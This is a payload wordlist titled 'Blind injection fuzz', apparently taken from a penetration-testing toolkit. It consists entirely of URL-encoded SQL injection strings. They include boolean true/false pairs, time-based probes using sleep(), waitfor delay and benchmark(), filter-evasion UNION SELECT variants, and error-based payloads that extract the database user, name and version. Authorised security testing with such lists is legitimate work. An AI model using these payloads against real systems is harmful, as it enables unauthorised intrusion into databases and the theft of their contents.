Blind injection fuzz
\
'
"
%df'
%df"
and%201=1
and%201=2
'%20and%20'1'='1
'%20and%20'1'='2
"%20and%20"1"="1
"%20and%20"1"="2
)%20and%20(1=1
)%20and%20(1=2
')%20and%20('1'='1
')%20and%20('1'='2
%'%20and%201=1%20and%20'%'='
%'%20and%201=2%20and%20'%'='x
%')%20and%201=1%20and%20('%'='
%')%20and%201=2%20and%20('%'='x
OR%201=1
OR%201=2
'%20OR%201=1--%20-
'%20OR%201=2--%20-
)%20OR%201=1--%20-
)%20OR%201=2--%20-
')%20OR%201=1--%20-
')%20OR%201=2--%20-
"%20OR%20"1"="1
"%20OR%20"1"="2
'%20OR%20'1'='1
'%20OR%20'1'='2
)%20OR%20(1=1
)%20OR%20(1=2
')%20OR%20('1'='1
')%20OR%20('1'='2
(case%20when(1=1)%20then%201%20else%20(select%201%20union%20select%202)%20end)
(case%20when(1=2)%20then%201%20else%20(select%201%20union%20select%202)%20end)
,(1-(case%20when(1=1)%20then%201%20else%20(select%201%20union%20select%202)%20end))
,(1-(case%20when(1=2)%20then%201%20else%20(select%201%20union%20select%202)%20end))
,1=if((1=1),1,(select%201%20union%20select%202))
,1=if((1=2),1,(select%201%20union%20select%202))
,If((1=1),1,(select%201%20union%20select%202))--%20-
,If((1=2),1,(select%201%20union%20select%202))--%20-
,If((1=1),sleep(4),(select%201%20union%20select%202))--%20-
-IF((1=1),1,(SELECT%201%20UNION%20SELECT%202))--%20-
-IF((1=2),1,(SELECT%201%20UNION%20SELECT%202))--%20-
-(case%20when(1=1)%20then%201%20else%20(select%201%20union%20select%202)%20end)
-(case%20when(1=2)%20then%201%20else%20(select%201%20union%20select%202)%20end)
'%2b(if((1=1%20and%20sleep(4)),1,(select%201%20union%20select%202)))%2b'a
-IF((1=1),sleep(4),(SELECT%201%20UNION%20SELECT%202))--%20-
';(SELECT%201%20FROM(SELECT(sleep(4)))lWuP)--%20-
;SELECT%20sleep(4)
);SELECT%20sleep(4)--%20-
;SELECT%20sleep(4)--%20-
;(SELECT%201%20FROM(SELECT(sleep(4)))lWuP)--%20-
'%20AND%20SLEEP(4)%23
AND%20sleep(4)
'%20AND%20sleep(4)%20AND%20'1'='1
')%20AND%20sleep(4)%20AND%20('1'='1
)%20AND%20sleep(4)%20AND%20(1=1
"%20AND%20sleep(4)%20AND%20"1"="
')%20and%20(select(0)from(select(sleep(4)))x)--%20-
and%20(select(0)from(select(sleep(4)))x)
and%20(select(0)from(select(sleep(4)))x)%20and%201=1
'%20and%20(select(0)from(select(sleep(4)))x)%20and%20'1'='1
"%20and%20(select(0)from(select(sleep(4)))x)%20and%20"1"="1
)%20and%20(select(0)from(select(sleep(4)))x)%20and%20(1=1
')%20and%20(select(0)from(select(sleep(4)))x)%20and%20('1'='1
rlike%20(select(0)from(select(sleep(4)))x)%20and%201=1
'%20rlike%20(select(0)from(select(sleep(4)))x)%20and%20'1'='1
)%20rlike%20(select(0)from(select(sleep(4)))x)%20and%20(1=1
')%20rlike%20(select(0)from(select(sleep(4)))x)%20and%20('1'='1
;waitfor%20delay%20'0:0:4'%20--%20-
';waitfor%20delay%20'0:0:4'%20--%20-
);waitfor%20delay%20'0:0:4'%20--%20-
');waitfor%20delay%20'0:0:4'%20--%20-
if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/
(SELECT%20*%20FROM(SELECT(sleep(4)))lWuP)
procedure%20analyse(extractvalue(1,if(1=1,benchmark(5000000,md5(1)),2)),1)
xor%201=2
xor%202=2
%2527%20%20%20%20%20%20%20
%0A%09UNION%0CSELECT%A0NULL%20%23
UNION%20SELECT%20/*!50000%205,null;%00*//*!40000%204,null--%20,*//*!30000%203,null--%20x*/0,null--+
''%20or%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(user(),0x7c,database(),0x7c,version())),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)k)%23
''%20or%20updatexml(1,concat(0x7e,(database())),0)%20